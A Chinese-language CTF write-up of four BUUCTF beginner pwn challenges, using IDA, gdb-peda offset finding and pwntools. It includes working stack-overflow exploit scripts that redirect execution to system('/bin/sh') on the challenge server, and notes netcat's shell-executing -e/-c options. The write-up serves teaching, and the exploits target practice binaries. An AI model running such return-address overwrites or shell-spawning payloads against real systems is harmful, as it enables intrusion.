(buuctf) - pwn入門部分wp - rip -- pwn1_sctf_2016

⭐ 【buuctf】pwn入門

pwn學習之路引入 棧溢出引入

⭐test_your_nc

【題目鏈接】 注意到 Ubuntu 18， Linux系統 。

nc 靶場

 nc node3.buuoj.cn 25677

【注】 nc命令詳解

-c shell命令為“-e”；使用/bin/sh來執行 [危險]

-e 文件名程序在連接后執行 [危險]

-b 允許廣播

-g 網關源路由躍點，最多8個

-G num源路由指針：4，8，12。。。

-i secs 發送的線路和掃描的端口的延遲間隔為1秒

-k 在套接字上設置keepalive選項

-l 監聽模式，用於入站連接

-n 僅數字IP地址，無DNS

-o 文件十六進制流量轉儲

-p 端口本地端口號

-r 隨機化本地和遠程端口

-q secs 在stdin上的EOF和秒延遲后q秒退出

-s addr地址本地源地址

-T tos 設置服務類型

-t 應答TELNET協商

-u UDP模式

-v verbose(使用兩次可更詳細)

-w 秒連接和最終網絡讀取超時

-C 發送CRLF作為行尾

-z 零I/O模式(用於掃描)

連接靶場后，執行 ls 命令，展示該靶場下目錄文件。

ls

注意到目錄下有個 flag文件 使用 cat命令進行查看。

cat flag

得到flag

flag{d9aef3cc-8aaf-41e3-8a25-ad2e6500c69a}

⭐rip

【題目鏈接】

利用file/checksec命令查看文件

【參考題解】

下載得到 pwn1，利用 file 命令查看。

或者可以采用 checksec ./filename 命令進行探測。//查看當前二進制文件的指令架構以及采取了哪些保護機制。

對於checksec命令安裝，可以直接選擇安裝pwntools（內置checksec命令）

sudo pip install pwntools
#或者選擇直接下載
git clone https://github.com/slimm609/checksec.sh

具體指令架構和保護機制可參考 該博客

IDA查看pwn1附件

顯而易見（ELF 64-bit）。放入IDA中查看。首先 f12+shift 轉到字符串窗口。發現 gets system /bin/sh （存在漏洞）

按 please input 進行數據塊跳轉。

之后，按下f5 查看偽代碼：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+1h] [rbp-Fh]
  puts("please input");
  gets((__int64)&s, (__int64)argv);
  puts(&s);
  puts("ok,bye!!!");
  return 0;
}

此時注意到 gets函數

gets函數的緩沖區是由用戶本身提供，由於用戶無法指定一次最多可讀入多少字節，導致此函數存在巨大安全隱患。換句話來說，就是gets若沒有遇到 \n 結束，則會無限讀取，沒有上限。

gets((__int64)&s, (__int64)argv);

雙擊 s ，查看需要多少字節 。以此來確定偏移量。

也就是說只需要存入15個字節地址，就可以get函數返回地址。

注意到 后面還有 db 8 dup(?)

db： 定義字節類型變量的偽指令

dup()： 重復定義圓括號中指定的初值，次數由前面的數值決定

?： 只分配存儲空間，不指定初值

因此 最后偏移量為 ： 15+8 = 23 。

當然也可以通過 peda 來計算偏移量。

① gdb中 peda插件安裝

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

②對其進行gdb調試：

gdb pwn1

③ 生成溢出字符，需保證其長度能覆蓋至RIP。執行 pattern create 200 命令

gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

④ 執行 r 或者 start 命令讓程序運行。//注意 start 命令執行后，還需執行 contin 命令。

在 please input 命令后，將之前生成的溢出字符串粘貼上去。

gdb-peda$ contin
Continuing.
please input
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
ok,bye!!!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x6f ('o')
RDX: 0x0
RSI: 0x4052a0 ("ok,bye!!!\nAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
RDI: 0x7fffff791670 --> 0x0
RBP: 0x412d41414341416e ('nAACAA-A')

注意到 RBP寄存器。也可以計算此時 nAACAA-A 的偏移量：

執行 pattern offset xxxxxx 命令。

pattern offset nAACAA-A

這里計算出的偏移量。不需要考慮堆棧平衡。構造playload時，直接與系統調用地址相加就可。

√ 通俗辦法：

找到 stack 復制棧頂的字符串 // 前四個字節（64 bits為前8個字節） 計算偏移量

[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe1a8 ("A(AADAA;AA)AAEAAaAA0AAFAAbA")
0008| 0x7fffffffe1b0 ("AA)AAEAAaAA0AAFAAbA")
0016| 0x7fffffffe1b8 ("aAA0AAFAAbA")
0024| 0x7fffffffe1c0 --> 0x100416241 
0032| 0x7fffffffe1c8 --> 0x401142 (<main>:	push   rbp)
0040| 0x7fffffffe1d0 --> 0x0 
0048| 0x7fffffffe1d8 --> 0x3777803596990da 
0056| 0x7fffffffe1e0 --> 0x401060 (<_start>:	xor    ebp,ebp)
[------------------------------------------------------------------------------]

執行 pattern offset xxxxxx 命令。

pattern offset A(AADAA;AA)AAEAAaAA0AAFAAbA

得到偏移量 23

回到 IDA pro中。尋找是否存在 系統調用函數。

找到 fun() 函數

int fun()
{
  return system("/bin/sh");
}

查看得到 地址為 0x401186。

編寫相應的 exp

exp編寫步驟：

from pwn import * #引入pwn庫

p = remote(ip, port) # 輸入對應的ip地址和端口號來連接其他主機的服務

... # 輸入payload來進行操作以拿到程序的shell payload一般等於 偏移量 + 地址

p.interactive() # 反彈shell

因此，編寫對應 exp：

exp1

from pwn import *

p = remote('node3.buuoj.cn', 27018)
payload = b'a' * 23 + p64(0x401186 + 1)
p.sendline(payload)

p.interactive()

+1 是為了保證堆棧平衡。對於payload ：

payload = b'a' * 23 + p64(0x401186) + p64(0x401185) #多加的這部分任意找ret語句 都可以

exp 2

from pwn import *

p = remote('node3.buuoj.cn', 27018)
payload = b'a' * 15 + p64(0x401186) 
p.sendline(payload)

p.interactive()

注意： 上述 payload中 'a' 可以替換成任意字母。

'a' 前面的 b是為了防止python3運行時出現以下錯誤。 // python2無事。

TypeError: can only concatenate str (not "bytes") to str

pwn環境准備

首先對相應的python/pip版本執行下載命令。即獲取 pwntools，方便 exp運行和進行交互調試。

(我這里下的是python3的，使用pip3下載)

pip3 install pwn

運行上面編好的exp，保存為 1.py

執行代碼。

python3 1.py
ls
cat flag

得到flag。

flag{2be84b3b-3172-481a-bc4b-dd99c48f0639}

⭐warmup_csaw_2016

【題目鏈接】

第一步 nc一下靶場： nc node3.buuoj.cn 25333

root@DESKTOP-VUB6KKI:/mnt/c/Users/11145/Desktop# nc node3.buuoj.cn 25333
-Warm Up-
WOW:0x40060d
>

得到 addr：0x40060d

老規矩， file 命令查看一下：

載入IDApro查看，

存在一個 cat flag.txt 命令。因此，直接對其進行 gdb調試，得到偏移量。 方法同上：

gdb warmup_csaw_2016
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /mnt/c/Users/11145/Desktop/warmup_csaw_2016
-Warm Up-
WOW:0x40060d
>AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7ffffffee650
RBX: 0x0
RCX: 0x7fffff78e980 --> 0xfbad2288
RDX: 0x0
RSI: 0x6022a1 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA\n")
RDI: 0x7fffff791680 --> 0x0
RBP: 0x4141334141644141 ('AAdAA3AA')

得到RBP寄存器中 'AAdAA3AA' 。往該字符串后，隨便復制一串，進行偏移量計算：

gdb-peda$ pattern offset IAAeAA4AAJAAf

編寫exp

from pwn import *

p = remote('node3.buuoj.cn', 25333)
payload = b'x' * 72 + p64(0x40060d)
p.sendline(payload)

p.interactive()

運行exp腳本得到：

得到flag

flag{10d21dd6-9b91-45de-bf83-e01e0083d45e}

⭐pwn1_sctf_2016

【題目鏈接】

下載得到 pwn1_sctf_2016 文件

checksec pwn1_sctf_2016

32位。載入IDA。shift+f12 發現 cat flag.txt 命令。跟進，追蹤函數：

如何計算偏移量

① 輸入多個I 查看最多可以轉變多少個 you。

nc node3.buuoj.cn 29866

20個I 可以填滿s溢出。

② 查看 s長度直接計算 I個數。

0000003C s               db ?
...........................................
+00000000  s              db 4 dup(?)

s長為 0x3c 即 60 。

又因為 fets限制為32個字符。我們必須利用 輸入I 便為 you 這個特性來實現填滿s。

60/3=20 也就是說需要 20個 I 方可實現填滿。

注意： db 4 dup(?) 這里還有4個字節內存要被占！

尋找地址

找到 get_flag 函數

int get_flag()
{
  return system("cat flag.txt");
}

地址為 ：08048F0D

編寫exp

from pwn import *

p = remote('node3.buuoj.cn', 29866)

# 因為最后還有四個字節需要填充，I代表三個字節再加上一個即可滿足。
payload = b'I' * 21 + b'x' + p64(0x8048F0D)

#下面這個亦可，直接用x填充4個字節。
#payload = b'I' * 20 + b'x' * 4 + p64(0x8048F0D)

p.sendline(payload)

p.interactive()

得到flag

flag{e23b1ad6-0af8-4a1f-9007-6e9bf909707c}

【侵權刪】

【轉載請放鏈接】 https://www.cnblogs.com/Jlay/p/pwn_wp1.html